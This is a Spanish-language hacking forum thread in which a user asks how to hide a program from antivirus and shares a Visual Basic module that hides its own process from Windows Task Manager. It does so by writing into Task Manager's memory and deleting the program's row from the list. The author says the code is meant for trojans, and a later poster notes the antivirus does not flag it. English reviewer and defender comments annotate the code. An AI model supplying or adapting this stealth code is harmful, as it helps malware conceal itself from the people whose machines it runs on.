app.taskvisible

Iniciado por xDie, 16 Septiembre 2006, 00:17 AM


xDie

Como puedo ocultar la aplicacion (no el proceso, este ya esta oculta gracias a otro metodo) sin que me detecte los antivirus
porque el app.taskvisible lo detectan..?? gracias
Licence to kill!

WarGhost

¿Qué culpa tengo yo de tener la sangre roja y el corazón a la izquierda?

Mr.Chispa

si me podes postear el code para ocultar el proceso te lo agradeceria mucho    ;D. saludos

xDie

#3
Cita de: Mr.Chispa en 16 Septiembre 2006, 14:05 PM
si me podes postear el code para ocultar el proceso te lo agradeceria mucho    ;D. saludos
Lo pones en un Modulo


'pa utilizarlo solo llamar a la funcion:
'call Ocultarme
'Los hacedores de estó(aunque ya habia visto porai cosas practicamente iwales
'vaya, sin los nombres procesitos y demas)
'99% --> ZEALOT
'0%--> el mendas(V_D_Y@hotmail.com)
'1%-->margen de error
'bugs: hombre pues como vereis no se cierra correctamente por lo del sleep y el doevent
'pero como la idea es pa troyanos y demas, pues como que no nos importa(ami por lo menos)

' Win32 imports and constants used by this module.
' user32: window lookup, child-window enumeration, window title/class queries and
' message sending. The "A" aliases bind the ANSI entry points.
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function EnumChildWindows Lib "user32" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hWnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long


' kernel32: cross-process memory access.
' NOTE(review): OpenProcess followed by VirtualAllocEx and Write/ReadProcessMemory
' against a process the caller did not start is the API sequence that
' behaviour-based endpoint monitoring typically keys on for process tampering.
' NOTE(review): the last ReadProcessMemory parameter is named
' lpNumberOfBytesWritten here; in the Win32 API it reports bytes read.
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

' Access rights requested from OpenProcess (only the three PROCESS_VM_* values are
' used in this listing).
' NOTE(review): PROCESS_ALL_ACCESS is declared as 0, which is not the Windows SDK
' value; it is not referenced anywhere in the visible code.
Private Const PROCESS_VM_OPERATION = &H8
Private Const PROCESS_VM_READ = &H10
Private Const PROCESS_VM_WRITE = &H20
Private Const PROCESS_ALL_ACCESS = 0
Private Const PAGE_READWRITE = &H4&

' Allocation flags for VirtualAllocEx / VirtualFreeEx. MEM_TOP_DOWN is declared
' but not used in the visible code.
Private Const MEM_COMMIT = &H1000
Private Const MEM_RESERVE = &H2000
Private Const MEM_RELEASE = &H8000
Private Const MEM_TOP_DOWN = &H100000

Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long


Private Declare Function Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) As Long

' List-view control messages. LVM_GETTITEMCOUNT is spelled with a double "T" in
' this module (the SDK name is LVM_GETITEMCOUNT); the value LVM_FIRST + 4 is what
' matters at runtime.
Private Const LVM_FIRST = &H1000
Private Const LVM_GETTITEMCOUNT& = (LVM_FIRST + 4)

' LVM_GETITEMW is the wide-character variant; the caller later converts the
' returned text with StrConv(..., vbFromUnicode).
' LVM_DELETEITEM is written as a decimal literal; 4104 equals LVM_FIRST + 8.
Private Const LVM_GETITEMW = (LVM_FIRST + 75)
Private Const LVIF_TEXT = &H1
Private Const LVM_DELETEITEM = 4104

' VB mirror of the list-view item structure passed with LVM_GETITEMW.
' JodeLosItems fills mask, iItem, lpszText and cchTextMax and copies the whole
' record into the process that owns the list view.
Private Type LV_ITEM
    mask As Long
    iItem As Long
    iSubItem As Long
    state As Long
    stateMask As Long
    lpszText As Long 'text buffer pointer (original note: LPCSTR); set to an address inside the target process
    cchTextMax As Long
    iImage As Long
    lParam As Long
    iIndent As Long
End Type

' Fixed-length 80-character buffer used as the local copy of one list-view
' item's text; its size is taken with LenB(lt) when it is copied between processes.
Private Type LV_TEXT
    sItemText As String * 80
End Type

' EnumChildWindows callback (passed via AddressOf in Ocultarme).
' Reads the title and class name of each child window; when it finds a
' "SysListView32" control titled "Procesos" it hands the handle to JodeLosItems.
' Returns False when both title and class are empty, True otherwise. On the match
' path the function exits without assigning a result, so VB's default (False) is
' returned.
' NOTE(review): lParam is declared ByRef As String but Ocultarme passes the
' number 1 as the enumeration parameter; the argument is never read here.
' NOTE(review): the match depends on the literal Spanish caption "Procesos", so it
' is tied to that UI language.
Private Function Procesitos(ByVal hWnd2 As Long, lParam As String) As Boolean
Dim Nombre As String * 255, nombreClase As String * 255
Dim Nombre2 As String, nombreClase2 As String
Dim X As Long, Y As Long
' X and Y receive the number of characters copied into the fixed buffers.
X = GetWindowText(hWnd2, Nombre, 255)
Y = GetClassName(hWnd2, nombreClase, 255)

' The buffers are fixed-length, so Left() is re-padded on assignment; Trim()
' then strips the padding to get the usable strings.
Nombre = Left(Nombre, X)
nombreClase = Left(nombreClase, Y)
Nombre2 = Trim(Nombre)
nombreClase2 = Trim(nombreClase)
If nombreClase2 = "SysListView32" And Nombre2 = "Procesos" Then
   JodeLosItems (hWnd2)
   Exit Function
End If
If Nombre2 = "" And nombreClase2 = "" Then
Procesitos = False
Else
Procesitos = True
End If
End Function

' Walks the rows of a list-view control owned by another process and sends
' LVM_DELETEITEM for the first row whose text equals App.EXEName & ".exe".
'
' Because the control lives in a different address space, the LV_ITEM record and
' its text buffer are allocated inside the owning process (DameMemComp), filled
' with WriteProcessMemory, and the answer is read back with ReadProcessMemory.
'
' Defender notes:
' - Only the row shown by that list-view control is removed. Nothing here touches
'   the operating system's process list, so the process stays visible to any tool
'   that enumerates processes itself instead of reading this window.
' - The routine needs a handle to the owning process with VM_OPERATION, VM_READ
'   and VM_WRITE rights plus remote allocations; handle-open and remote-write
'   telemetry on the Task Manager process is therefore the place to look.
' - No return value of OpenProcess, VirtualAllocEx, WriteProcessMemory or
'   ReadProcessMemory is checked.
Private Function JodeLosItems(ByVal hListView As Long) ' As Variant
   Dim pid As Long, tid As Long
   Dim hProceso As Long, nElem As Long, lEscribiendo As Long, i As Long
   Dim DirMemComp As Long, dwTam As Long
   Dim DirMemComp2 As Long
   Dim sLVItems() As String
   Dim li As LV_ITEM
   Dim lt As LV_TEXT
   If hListView = 0 Then Exit Function
   ' pid receives the id of the process that owns the control.
   tid = GetWindowThreadProcessId(hListView, pid)
   nElem = SendMessage(hListView, LVM_GETTITEMCOUNT, 0, 0&)
   If nElem = 0 Then Exit Function
   ' sLVItems is sized here but never read or written afterwards.
   ReDim sLVItems(nElem - 1)
   li.cchTextMax = 80
   dwTam = Len(li)
      ' Two remote buffers: one for the LV_ITEM record, one for the item text.
      ' Each DameMemComp call opens its own handle and stores it in hProceso, so
      ' the handle from the first call is overwritten by the second.
      DirMemComp = DameMemComp(pid, dwTam, hProceso)
      DirMemComp2 = DameMemComp(pid, LenB(lt), hProceso)
      For i = 0 To nElem - 1
          ' lpszText must point into the target process, hence the remote address.
          li.lpszText = DirMemComp2
          li.cchTextMax = 80
          li.iItem = i
          li.mask = LVIF_TEXT
          WriteProcessMemory hProceso, ByVal DirMemComp, li, dwTam, lEscribiendo
          lt.sItemText = Space(80)
          WriteProcessMemory hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo
          ' The control fills the remote text buffer; it is then copied back locally.
          Call SendMessage(hListView, LVM_GETITEMW, 0, ByVal DirMemComp)
          Call ReadProcessMemory(hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo)
          ' Original author's marker: "CAMBIAR" (change) flags the name to compare against.
          If TrimNull(StrConv(lt.sItemText, vbFromUnicode)) = App.EXEName & ".exe" Then '"firefox.exe" Then '<===========CAMBIAR
           Call SendMessage(hListView, LVM_DELETEITEM, i, 0)
           ' This exit skips both AdiosMemComp calls below, so the remote
           ' allocations and the open handle are left behind on the match path.
           Exit Function
          End If
      Next i
      ' The first call closes hProceso; the second call then runs with a handle
      ' that has already been closed.
      AdiosMemComp hProceso, DirMemComp, dwTam
      AdiosMemComp hProceso, DirMemComp2, LenB(lt)
End Function

' Opens process `pid` with VM_OPERATION, VM_READ and VM_WRITE rights and commits
' `memTam` bytes of read/write memory inside it.
' hProceso (ByRef) receives the process handle; the function result is the
' address returned by VirtualAllocEx.
' NOTE(review): neither call is checked for failure, so a zero handle or zero
' address is returned to the caller unchanged.
Private Function DameMemComp(ByVal pid As Long, ByVal memTam As Long, hProceso As Long) As Long
    hProceso = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE, False, pid)
    DameMemComp = VirtualAllocEx(ByVal hProceso, ByVal 0&, ByVal memTam, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
End Function

' Counterpart of DameMemComp: asks VirtualFreeEx to release the remote block at
' DirMem and then closes the process handle.
' NOTE(review): the Win32 documentation requires dwSize to be 0 when MEM_RELEASE
' is used; memTam is passed here and the result is ignored - confirm whether the
' release actually succeeds.
Private Sub AdiosMemComp(ByVal hProceso As Long, ByVal DirMem As Long, ByVal memTam As Long)
   Call VirtualFreeEx(hProceso, ByVal DirMem, memTam, MEM_RELEASE)
   CloseHandle hProceso
End Sub
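' Returns the part of jaja that precedes the first NUL character (Chr$(0)).
' When jaja contains no NUL it is returned unchanged.
' The position is held in a Long: InStr returns a Long, and an Integer would
' overflow for a NUL located past character 32767.
Private Function TrimNull(jaja As String) As String
   Dim nulAt As Long
   nulAt = InStr(jaja, vbNullChar)
   If nulAt = 0 Then
      TrimNull = jaja
   Else
      TrimNull = Left$(jaja, nulAt - 1)
   End If
End Function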

' Public entry point. Runs an endless loop that, every 100 ms, looks up a
' top-level window titled "Administrador de tareas de Windows" and enumerates its
' child windows through the Procesitos callback.
'
' Defender notes:
' - The loop has no exit condition; the original author's header lists this as
'   the reason the program does not shut down cleanly.
' - The lookup depends on the literal Spanish window caption, and the effect is
'   limited to what that window displays. Process listings obtained by other
'   means are not changed by anything in this module.
' NOTE(review): hWnd1 is not declared in the visible listing.
Public Sub Ocultarme()

Do While True
 
    Sleep 100
    hWnd1 = FindWindow(vbNullString, "Administrador de tareas de Windows")
    EnumChildWindows hWnd1, AddressOf Procesitos, 1
    ' Yield to the VB message loop so the host form stays responsive.
    DoEvents
Loop

End Sub


Lo llamas asi ejemplo : Call Ocultarme

Warghost, voy a bichar eso a ver qué tal, gracias  :)
Licence to kill!

Mr.Chispa


dPix

Muy interesante :D, además el AV/FW por lo visto no pide autorización.